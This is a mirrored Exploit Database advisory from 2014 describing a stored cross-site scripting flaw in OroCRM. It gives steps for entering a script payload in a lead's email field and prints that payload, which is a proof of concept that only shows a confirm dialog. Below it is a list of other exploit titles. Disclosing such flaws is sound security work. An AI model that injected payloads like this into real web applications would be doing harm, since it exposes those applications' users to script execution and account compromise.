OroCRM – Persistent Cross-Site Scripting

Exploit Database
35 阅读

作者： Provensec

日期： 2014-09-11
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/34624/

# Affected software: OroCRM is an easy-to-use, open source CRM with built in marketing automation tools for your commerce business. It's the CRM built for both sales and marketing!
# Discovered by: Provensec
# Website: http://www.provensec.com
# Author: Provensec Labs
# Type of vulnerability: XSS Stored
# Description:

1 Goto http://server add a new lead fill all the fields properly but Fill the email filed with xss payloadas given in the screenshot
http://prntscr.com/4lf043 

payload used "><img src=d onerror=confirm(/provensec/);>

2 click save and close button

http://prntscr.com/4lf0ej

last Exploits
OroCRM – Persistent Cross-Site Scripting的更多信息

BXR 0.6.8 – Cross-Site Request Forgery：
Boelter Blue System Management 1.3 – SQL Injection：
Netis WF2419 Router – Cross-Site Request Forgery：
Metasploit Project < 4.11.1 - Initial User Creation Cross-Site Request Forgery (Metasploit)：
Online University – Authentication Bypass：
PTCeffect 4.6 – Local File Inclusion / SQL Injection：
D-Link DKVM-IP8 – Cross-Site Scripting：
Finance Website Script – SQL Injection：